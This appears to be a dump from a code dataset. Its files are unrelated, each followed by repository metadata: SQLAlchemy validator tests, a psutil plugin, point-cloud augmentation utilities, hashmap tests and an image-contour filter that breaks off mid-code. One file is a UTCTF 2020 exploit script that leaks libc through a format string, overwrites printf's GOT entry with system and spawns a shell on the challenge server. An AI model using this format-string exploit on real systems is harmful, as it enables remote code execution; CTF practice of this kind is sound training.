class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses.append("e1")
u1.addresses.append("e2")
eq_(
u1.addresses,
[Address(email_address="e1"), Address(email_address="e2")],
)
u1.addresses = ["e3", "e4"]
eq_(
u1.addresses,
[Address(email_address="e3"), Address(email_address="e4")],
)
def test_validator_bulk_dict_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={
"addresses": relationship(
Address,
collection_class=collections.attribute_mapped_collection(
"email_address"
),
)
},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses["e1"] = "e1"
u1.addresses["e2"] = "e2"
eq_(
u1.addresses,
{
"e1": Address(email_address="e1"),
"e2": Address(email_address="e2"),
},
)
u1.addresses = {"e3": "e3", "e4": "e4"}
eq_(
u1.addresses,
{
"e3": Address(email_address="e3"),
"e4": Address(email_address="e4"),
},
)
def test_validator_as_callable_object(self):
"""test #6538"""
users = self.tables.users
canary = Mock()
class SomeValidator(object):
def __call__(self, obj, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
class User(fixtures.ComparableEntity):
sv = validates("name")(SomeValidator())
self.mapper_registry.map_imperatively(User, users)
u1 = User(name="ed")
eq_(u1.name, "ed modified")
def test_validator_multi_warning(self):
users = self.tables.users
class Foo(object):
@validates("name")
def validate_one(self, key, value):
pass
@validates("name")
def validate_two(self, key, value):
pass
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Foo|users already exists",
self.mapper_registry.map_imperatively,
Foo,
users,
)
class Bar(object):
@validates("id")
def validate_three(self, key, value):
return value + 10
@validates("id", "name")
def validate_four(self, key, value):
return value + "foo"
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Bar|users already exists",
self.mapper_registry.map_imperatively,
Bar,
users,
)
def test_validator_wo_backrefs_wo_removes(self):
self._test_validator_backrefs(False, False)
def test_validator_wo_backrefs_w_removes(self):
self._test_validator_backrefs(False, True)
def test_validator_w_backrefs_wo_removes(self):
self._test_validator_backrefs(True, False)
def test_validator_w_backrefs_w_removes(self):
self._test_validator_backrefs(True, True)
def _test_validator_backrefs(self, include_backrefs, include_removes):
users, addresses = (self.tables.users, self.tables.addresses)
canary = Mock()
class User(fixtures.ComparableEntity):
if include_removes:
@validates(
"addresses",
include_removes=True,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates(
"addresses",
include_removes=False,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item):
canary(key, item)
return item
class Address(fixtures.ComparableEntity):
if include_removes:
@validates(
"user",
include_backrefs=include_backrefs,
include_removes=True,
)
def validate_user(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates("user", include_backrefs=include_backrefs)
def validate_user(self, key, item):
canary(key, item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={"addresses": relationship(Address, backref="user")},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u2 = User()
a1, a2 = Address(), Address()
# 3 append/set, two removes
u1.addresses.append(a1)
u1.addresses.append(a2)
a2.user = u2
del a1.user
u2.addresses.remove(a2)
# copy, so that generation of the
# comparisons don't get caught
calls = list(canary.mock_calls)
if include_backrefs:
if include_removes:
eq_(
calls,
[
# append #1
call("addresses", Address(), False),
# backref for append
call("user", User(addresses=[]), False),
# append #2
call("addresses", Address(user=None), False),
# backref for append
call("user", User(addresses=[]), False),
# assign a2.user = u2
call("user", User(addresses=[]), False),
# backref for u1.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for u2.addresses.append(a2)
call("addresses", Address(user=None), False),
# del a1.user
call("user", User(addresses=[]), True),
# backref for u1.addresses.remove(a1)
call("addresses", Address(), True),
# u2.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for a2.user = None
call("user", None, False),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", None),
],
)
else:
if include_removes:
eq_(
calls,
[
call("addresses", Address(), False),
call("addresses", Address(user=None), False),
call("user", User(addresses=[]), False),
call("user", User(addresses=[]), True),
call("addresses", Address(user=None), True),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
],
)
| 33.498901
| 79
| 0.50328
|
from sqlalchemy import exc
from sqlalchemy.orm import collections
from sqlalchemy.orm import relationship
from sqlalchemy.orm import validates
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import ne_
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from test.orm import _fixtures
class ValidatorTest(_fixtures.FixtureTest):
def test_scalar(self):
users = self.tables.users
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
self.mapper_registry.map_imperatively(User, users)
sess = fixture_session()
u1 = User(name="ed")
eq_(u1.name, "ed modified")
assert_raises(AssertionError, setattr, u1, "name", "fred")
eq_(u1.name, "ed modified")
eq_(canary.mock_calls, [call("name", "ed"), call("name", "fred")])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="ed modified").one(),
User(name="ed"),
)
def test_collection(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("addresses")
def validate_address(self, key, ad):
canary(key, ad)
assert "@" in ad.email_address
return ad
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
sess = fixture_session()
u1 = User(name="edward")
a0 = Address(email_address="noemail")
assert_raises(AssertionError, u1.addresses.append, a0)
a1 = Address(id=15, email_address="foo@bar.com")
u1.addresses.append(a1)
eq_(canary.mock_calls, [call("addresses", a0), call("addresses", a1)])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="edward").one(),
User(
name="edward", addresses=[Address(email_address="foo@bar.com")]
),
)
def test_validators_dict(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
ne_(name, "fred")
return name + " modified"
@validates("addresses")
def validate_address(self, key, ad):
assert "@" in ad.email_address
return ad
def simple_function(self, key, value):
return key, value
u_m = self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
eq_(
dict((k, v[0].__name__) for k, v in list(u_m.validators.items())),
{"name": "validate_name", "addresses": "validate_address"},
)
def test_validator_w_removes(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name", include_removes=True)
def validate_name(self, key, item, remove):
canary(key, item, remove)
return item
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.name = "ed"
u1.name = "mary"
del u1.name
a1, a2, a3 = Address(), Address(), Address()
u1.addresses.append(a1)
u1.addresses.remove(a1)
u1.addresses = [a1, a2]
u1.addresses = [a2, a3]
eq_(
canary.mock_calls,
[
call("name", "ed", False),
call("name", "mary", False),
call("name", "mary", True),
call("addresses", a1, False),
call("addresses", a1, True),
call("addresses", a1, False),
call("addresses", a2, False),
call("addresses", a2, False),
call("addresses", a3, False),
call("addresses", a1, True),
],
)
def test_validator_bulk_collection_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses.append("e1")
u1.addresses.append("e2")
eq_(
u1.addresses,
[Address(email_address="e1"), Address(email_address="e2")],
)
u1.addresses = ["e3", "e4"]
eq_(
u1.addresses,
[Address(email_address="e3"), Address(email_address="e4")],
)
def test_validator_bulk_dict_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={
"addresses": relationship(
Address,
collection_class=collections.attribute_mapped_collection(
"email_address"
),
)
},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses["e1"] = "e1"
u1.addresses["e2"] = "e2"
eq_(
u1.addresses,
{
"e1": Address(email_address="e1"),
"e2": Address(email_address="e2"),
},
)
u1.addresses = {"e3": "e3", "e4": "e4"}
eq_(
u1.addresses,
{
"e3": Address(email_address="e3"),
"e4": Address(email_address="e4"),
},
)
def test_validator_as_callable_object(self):
users = self.tables.users
canary = Mock()
class SomeValidator(object):
def __call__(self, obj, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
class User(fixtures.ComparableEntity):
sv = validates("name")(SomeValidator())
self.mapper_registry.map_imperatively(User, users)
u1 = User(name="ed")
eq_(u1.name, "ed modified")
def test_validator_multi_warning(self):
users = self.tables.users
class Foo(object):
@validates("name")
def validate_one(self, key, value):
pass
@validates("name")
def validate_two(self, key, value):
pass
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Foo|users already exists",
self.mapper_registry.map_imperatively,
Foo,
users,
)
class Bar(object):
@validates("id")
def validate_three(self, key, value):
return value + 10
@validates("id", "name")
def validate_four(self, key, value):
return value + "foo"
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Bar|users already exists",
self.mapper_registry.map_imperatively,
Bar,
users,
)
def test_validator_wo_backrefs_wo_removes(self):
self._test_validator_backrefs(False, False)
def test_validator_wo_backrefs_w_removes(self):
self._test_validator_backrefs(False, True)
def test_validator_w_backrefs_wo_removes(self):
self._test_validator_backrefs(True, False)
def test_validator_w_backrefs_w_removes(self):
self._test_validator_backrefs(True, True)
def _test_validator_backrefs(self, include_backrefs, include_removes):
users, addresses = (self.tables.users, self.tables.addresses)
canary = Mock()
class User(fixtures.ComparableEntity):
if include_removes:
@validates(
"addresses",
include_removes=True,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates(
"addresses",
include_removes=False,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item):
canary(key, item)
return item
class Address(fixtures.ComparableEntity):
if include_removes:
@validates(
"user",
include_backrefs=include_backrefs,
include_removes=True,
)
def validate_user(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates("user", include_backrefs=include_backrefs)
def validate_user(self, key, item):
canary(key, item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={"addresses": relationship(Address, backref="user")},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u2 = User()
a1, a2 = Address(), Address()
u1.addresses.append(a1)
u1.addresses.append(a2)
a2.user = u2
del a1.user
u2.addresses.remove(a2)
calls = list(canary.mock_calls)
if include_backrefs:
if include_removes:
eq_(
calls,
[
# append #1
call("addresses", Address(), False),
# backref for append
call("user", User(addresses=[]), False),
# append #2
call("addresses", Address(user=None), False),
# backref for append
call("user", User(addresses=[]), False),
# assign a2.user = u2
call("user", User(addresses=[]), False),
# backref for u1.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for u2.addresses.append(a2)
call("addresses", Address(user=None), False),
# del a1.user
call("user", User(addresses=[]), True),
# backref for u1.addresses.remove(a1)
call("addresses", Address(), True),
# u2.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for a2.user = None
call("user", None, False),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", None),
],
)
else:
if include_removes:
eq_(
calls,
[
call("addresses", Address(), False),
call("addresses", Address(user=None), False),
call("user", User(addresses=[]), False),
call("user", User(addresses=[]), True),
call("addresses", Address(user=None), True),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
],
)
| true
| true
|
1c491ed6f81ab3f1238484940ba63ee8a71c9b5d
| 180
|
py
|
Python
|
application/prophasis_agent/prophasis_agent/plugin_repo/memory_usage/memory_usage.py
|
camerongray1515/temp
|
80639026992172166b7992b209f1694ca792d2df
|
[
"BSD-2-Clause"
] | 1
|
2016-05-14T19:58:17.000Z
|
2016-05-14T19:58:17.000Z
|
application/prophasis_agent/prophasis_agent/plugin_repo/memory_usage/memory_usage.py
|
camerongray1515/temp
|
80639026992172166b7992b209f1694ca792d2df
|
[
"BSD-2-Clause"
] | 62
|
2016-05-24T19:43:45.000Z
|
2016-05-25T15:16:34.000Z
|
application/prophasis_agent/prophasis_agent/plugin_repo/memory_usage/memory_usage.py
|
camerongray1515/temp
|
80639026992172166b7992b209f1694ca792d2df
|
[
"BSD-2-Clause"
] | 1
|
2019-10-17T16:06:55.000Z
|
2019-10-17T16:06:55.000Z
|
import psutil
from plugin import PluginInterface, PluginResult
class Plugin(PluginInterface):
def get_data(self):
return PluginResult(psutil.virtual_memory().percent)
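# Usage sketch (editor's addition): outside the agent framework this plugin
# simply wraps psutil, e.g. Plugin().get_data() returns a PluginResult holding
# psutil.virtual_memory().percent (a float such as 42.3).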
| 25.714286
| 60
| 0.783333
|
import psutil
from plugin import PluginInterface, PluginResult
class Plugin(PluginInterface):
def get_data(self):
return PluginResult(psutil.virtual_memory().percent)
| true
| true
|
1c491edab6995691581b78f5c7a45713e71bc4ed
| 2,345
|
py
|
Python
|
pcdet/datasets/augmentor/augmentor_utils.py
|
Gltina/OpenPCDet
|
e32dc7f8f903a3f0e1c93effc68d74dbe16766e2
|
[
"Apache-2.0"
] | 205
|
2021-03-23T20:17:42.000Z
|
2022-03-30T14:32:41.000Z
|
pcdet/datasets/augmentor/augmentor_utils.py
|
Gltina/OpenPCDet
|
e32dc7f8f903a3f0e1c93effc68d74dbe16766e2
|
[
"Apache-2.0"
] | 83
|
2021-03-24T05:22:28.000Z
|
2022-03-28T13:44:09.000Z
|
pcdet/datasets/augmentor/augmentor_utils.py
|
Gltina/OpenPCDet
|
e32dc7f8f903a3f0e1c93effc68d74dbe16766e2
|
[
"Apache-2.0"
] | 38
|
2021-03-25T08:52:34.000Z
|
2022-03-30T14:37:40.000Z
|
import numpy as np
from ...utils import common_utils
def random_flip_along_x(gt_boxes, points):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C)
Returns:
"""
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, 6] = -gt_boxes[:, 6]
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 8] = -gt_boxes[:, 8]
return gt_boxes, points
def random_flip_along_y(gt_boxes, points):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C)
Returns:
"""
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 0] = -gt_boxes[:, 0]
gt_boxes[:, 6] = -(gt_boxes[:, 6] + np.pi)
points[:, 0] = -points[:, 0]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7] = -gt_boxes[:, 7]
return gt_boxes, points
def global_rotation(gt_boxes, points, rot_range):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C),
rot_range: [min, max]
Returns:
"""
noise_rotation = np.random.uniform(rot_range[0], rot_range[1])
points = common_utils.rotate_points_along_z(points[np.newaxis, :, :], np.array([noise_rotation]))[0]
gt_boxes[:, 0:3] = common_utils.rotate_points_along_z(gt_boxes[np.newaxis, :, 0:3], np.array([noise_rotation]))[0]
gt_boxes[:, 6] += noise_rotation
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7:9] = common_utils.rotate_points_along_z(
np.hstack((gt_boxes[:, 7:9], np.zeros((gt_boxes.shape[0], 1))))[np.newaxis, :, :],
np.array([noise_rotation])
)[0][:, 0:2]
return gt_boxes, points
def global_scaling(gt_boxes, points, scale_range):
"""
Args:
gt_boxes: (N, 7), [x, y, z, dx, dy, dz, heading]
points: (M, 3 + C),
scale_range: [min, max]
Returns:
"""
if scale_range[1] - scale_range[0] < 1e-3:
return gt_boxes, points
noise_scale = np.random.uniform(scale_range[0], scale_range[1])
points[:, :3] *= noise_scale
gt_boxes[:, :6] *= noise_scale
return gt_boxes, points
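# --- Usage sketch (editor's addition): chaining the augmentations on toy data.
# (The module's relative imports mean this only runs inside the pcdet package.)
#   gt = np.random.rand(4, 7).astype(np.float32)     # (N, 7): x, y, z, dx, dy, dz, heading
#   pts = np.random.rand(100, 4).astype(np.float32)  # (M, 3 + C)
#   gt, pts = random_flip_along_x(gt, pts)
#   gt, pts = global_rotation(gt, pts, rot_range=[-np.pi / 4, np.pi / 4])
#   gt, pts = global_scaling(gt, pts, scale_range=[0.95, 1.05])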
| 29.683544
| 118
| 0.550959
|
import numpy as np
from ...utils import common_utils
def random_flip_along_x(gt_boxes, points):
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, 6] = -gt_boxes[:, 6]
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 8] = -gt_boxes[:, 8]
return gt_boxes, points
def random_flip_along_y(gt_boxes, points):
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 0] = -gt_boxes[:, 0]
gt_boxes[:, 6] = -(gt_boxes[:, 6] + np.pi)
points[:, 0] = -points[:, 0]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7] = -gt_boxes[:, 7]
return gt_boxes, points
def global_rotation(gt_boxes, points, rot_range):
noise_rotation = np.random.uniform(rot_range[0], rot_range[1])
points = common_utils.rotate_points_along_z(points[np.newaxis, :, :], np.array([noise_rotation]))[0]
gt_boxes[:, 0:3] = common_utils.rotate_points_along_z(gt_boxes[np.newaxis, :, 0:3], np.array([noise_rotation]))[0]
gt_boxes[:, 6] += noise_rotation
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7:9] = common_utils.rotate_points_along_z(
np.hstack((gt_boxes[:, 7:9], np.zeros((gt_boxes.shape[0], 1))))[np.newaxis, :, :],
np.array([noise_rotation])
)[0][:, 0:2]
return gt_boxes, points
def global_scaling(gt_boxes, points, scale_range):
if scale_range[1] - scale_range[0] < 1e-3:
return gt_boxes, points
noise_scale = np.random.uniform(scale_range[0], scale_range[1])
points[:, :3] *= noise_scale
gt_boxes[:, :6] *= noise_scale
return gt_boxes, points
| true
| true
|
1c491f2fa9db695df7ef78843cf977a3619822a0
| 835
|
py
|
Python
|
utctf2020/zurk/exploit.py
|
nhtri2003gmail/ctf-write-ups
|
7e969c47027c39b614e10739ae3a953eed17dfa3
|
[
"MIT"
] | 101
|
2020-03-09T17:40:47.000Z
|
2022-03-31T23:26:55.000Z
|
utctf2020/zurk/exploit.py
|
nhtri2003gmail/ctf-write-ups
|
7e969c47027c39b614e10739ae3a953eed17dfa3
|
[
"MIT"
] | 1
|
2021-11-09T13:39:40.000Z
|
2021-11-10T19:15:04.000Z
|
utctf2020/zurk/exploit.py
|
datajerk/ctf-write-ups
|
1bc4ecc63a59de7d924c7214b1ce467801792da0
|
[
"MIT"
] | 31
|
2020-05-27T12:29:50.000Z
|
2022-03-31T23:23:32.000Z
|
#!/usr/bin/env python
from pwn import *
libc = ELF('libc-2.23.so')
#p = process('./zurk')
p = remote('binary.utctf.live',9003)
p.recvuntil('to do?')
p.sendline('%7$p')
_IO_2_1_stdout_ = int(p.recvuntil('to do?').split()[0],0)
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']
base = _IO_2_1_stdout_ - _IO_2_1_stdout_offset
zurk=ELF('zurk')
_printf = zurk.got['printf']
__libc_system = libc.symbols['system']
address = base + __libc_system
words=[ address & 0xFFFF, (address >> 16) & 0xFFFF ]
assert(words[0] < words[1])
payload = ""
payload += "%" + str(words[0]).rjust(6,'0') + "x"
payload += "%0010$hn"
payload += "%" + str(words[1]-words[0]).rjust(6,'0') + "x"
payload += "%0011$hn"
payload += p64(_printf)
payload += p64(_printf + 2)
p.sendline(payload)
p.recvuntil('to do?')
p.sendline('/bin/sh')
p.interactive()
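# Sanity check (editor's addition): the two partial %hn writes reconstruct the
# low 32 bits of system's address at printf@GOT:
#   assert (words[1] << 16) | words[0] == address & 0xFFFFFFFF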
| 21.410256
| 58
| 0.65509
|
from pwn import *
libc = ELF('libc-2.23.so')
p = remote('binary.utctf.live',9003)
p.recvuntil('to do?')
p.sendline('%7$p')
_IO_2_1_stdout_ = int(p.recvuntil('to do?').split()[0],0)
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']
base = _IO_2_1_stdout_ - _IO_2_1_stdout_offset
zurk=ELF('zurk')
_printf = zurk.got['printf']
__libc_system = libc.symbols['system']
address = base + __libc_system
words=[ address & 0xFFFF, (address >> 16) & 0xFFFF ]
assert(words[0] < words[1])
payload = ""
payload += "%" + str(words[0]).rjust(6,'0') + "x"
payload += "%0010$hn"
payload += "%" + str(words[1]-words[0]).rjust(6,'0') + "x"
payload += "%0011$hn"
payload += p64(_printf)
payload += p64(_printf + 2)
p.sendline(payload)
p.recvuntil('to do?')
p.sendline('/bin/sh')
p.interactive()
| true
| true
|
1c491fcff19cab06a1d0d644a25667157e9d40d8
| 1,446
|
py
|
Python
|
python/hashmap_repeated_word/tests/test_hashmap_repeated_word.py
|
mohmmadnoorjebreen/data-structures-and-algorithms
|
ab69cd9dc48e8508947a6f3f316cb44a96c99c42
|
[
"MIT"
] | null | null | null |
python/hashmap_repeated_word/tests/test_hashmap_repeated_word.py
|
mohmmadnoorjebreen/data-structures-and-algorithms
|
ab69cd9dc48e8508947a6f3f316cb44a96c99c42
|
[
"MIT"
] | 18
|
2021-07-29T19:52:28.000Z
|
2021-09-11T11:22:43.000Z
|
python/hashmap_repeated_word/tests/test_hashmap_repeated_word.py
|
mohmmadnoorjebreen/data-structures-and-algorithms
|
ab69cd9dc48e8508947a6f3f316cb44a96c99c42
|
[
"MIT"
] | null | null | null |
from hashmap_repeated_word import __version__
from hashmap_repeated_word.hashmap import HashTable
def test_version():
assert __version__ == '0.1.0'
def test_hashmap_repeated_word_1():
hash = HashTable()
str="Once upon a time, there was a brave princess who..."
excepted = 'a'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_2():
hash = HashTable()
str="It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair, we had everything before us, we had nothing before us, we were all going direct to Heaven, we were all going direct the other way – in short, the period was so far like the present period, that some of its noisiest authorities insisted on its being received, for good or for evil, in the superlative degree of comparison only..."
excepted = 'it'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_3():
hash = HashTable()
str="It was a queer, sultry summer, the summer they electrocuted the Rosenbergs, and I didn’t know what I was doing in New York..."
excepted = 'summer'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
| 51.642857
| 625
| 0.739281
|
from hashmap_repeated_word import __version__
from hashmap_repeated_word.hashmap import HashTable
def test_version():
assert __version__ == '0.1.0'
def test_hashmap_repeated_word_1():
hash = HashTable()
str="Once upon a time, there was a brave princess who..."
excepted = 'a'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_2():
hash = HashTable()
str="It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair, we had everything before us, we had nothing before us, we were all going direct to Heaven, we were all going direct the other way – in short, the period was so far like the present period, that some of its noisiest authorities insisted on its being received, for good or for evil, in the superlative degree of comparison only..."
excepted = 'it'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_3():
hash = HashTable()
str="It was a queer, sultry summer, the summer they electrocuted the Rosenbergs, and I didn’t know what I was doing in New York..."
excepted = 'summer'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
| true
| true
|
1c4921cfeca9e8e27f2d0b623dc27dabba9abc92
| 10,495
|
py
|
Python
|
ipt/ipt_filter_contour_by_size.py
|
tpmp-inra/ipapi
|
b0f6be8960a20dbf95ef9df96efdd22bd6e031c5
|
[
"MIT"
] | 1
|
2020-06-30T06:53:36.000Z
|
2020-06-30T06:53:36.000Z
|
ipt/ipt_filter_contour_by_size.py
|
tpmp-inra/ipapi
|
b0f6be8960a20dbf95ef9df96efdd22bd6e031c5
|
[
"MIT"
] | null | null | null |
ipt/ipt_filter_contour_by_size.py
|
tpmp-inra/ipapi
|
b0f6be8960a20dbf95ef9df96efdd22bd6e031c5
|
[
"MIT"
] | null | null | null |
from ipso_phen.ipapi.base.ipt_abstract import IptBase
from ipso_phen.ipapi.tools import regions
import numpy as np
import cv2
import logging
logger = logging.getLogger(__name__)
from ipso_phen.ipapi.base import ip_common as ipc
class IptFilterContourBySize(IptBase):
def build_params(self):
self.add_enabled_checkbox()
self.add_spin_box(
name="min_threshold",
desc="Lower bound limit",
default_value=0,
minimum=0,
maximum=100000000,
hint="Only contours bigger than lower limit bound will be kept",
)
self.add_spin_box(
name="max_threshold",
desc="Upper bound limit",
default_value=100000000,
minimum=0,
maximum=100000000,
hint="Only contours smaller than lower limit bound will be kept",
)
self.add_roi_selector()
def process_wrapper(self, **kwargs):
"""
Filter contour by size:
        Keep or discard contours according to their size.
Real time: False
Keyword Arguments (in parentheses, argument name):
* Activate tool (enabled): Toggle whether or not tool is active
* Lower bound limit (min_threshold): Only contours bigger than lower limit bound will be kept
* Upper bound limit (max_threshold): Only contours smaller than lower limit bound will be kept
* Name of ROI to be used (roi_names): Operation will only be applied inside of ROI
* ROI selection mode (roi_selection_mode):
"""
wrapper = self.init_wrapper(**kwargs)
if wrapper is None:
return False
res = False
try:
if self.get_value_of("enabled") == 1:
mask = self.get_mask()
if mask is None:
logger.error(f"FAIL {self.name}: mask must be initialized")
return
lt, ut = self.get_value_of("min_threshold"), self.get_value_of(
"max_threshold"
)
# Get source contours
contours = [
c
for c in ipc.get_contours(
mask=mask,
retrieve_mode=cv2.RETR_LIST,
method=cv2.CHAIN_APPROX_SIMPLE,
)
if cv2.contourArea(c, True) < 0
]
contours.sort(key=lambda x: cv2.contourArea(x), reverse=True)
colors = ipc.build_color_steps(step_count=len(contours))
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for clr, cnt in zip(colors, contours):
cv2.drawContours(dbg_img, [cnt], 0, clr, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
wrapper.store_image(
image=dbg_img,
text="all_contours",
)
fnt = (cv2.FONT_HERSHEY_SIMPLEX, 0.6)
for cnt in contours:
area_ = cv2.contourArea(cnt)
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
if area_ > 0:
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
(255, 255, 255),
2,
)
wrapper.store_image(
image=dbg_img,
text="all_contours_with_sizes",
)
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
out_mask = np.zeros_like(mask)
                # Contours colored by size class (red: too small, blue: too large, white: kept)
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size")
                # Same coloring, iterating largest contours first
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in sorted(
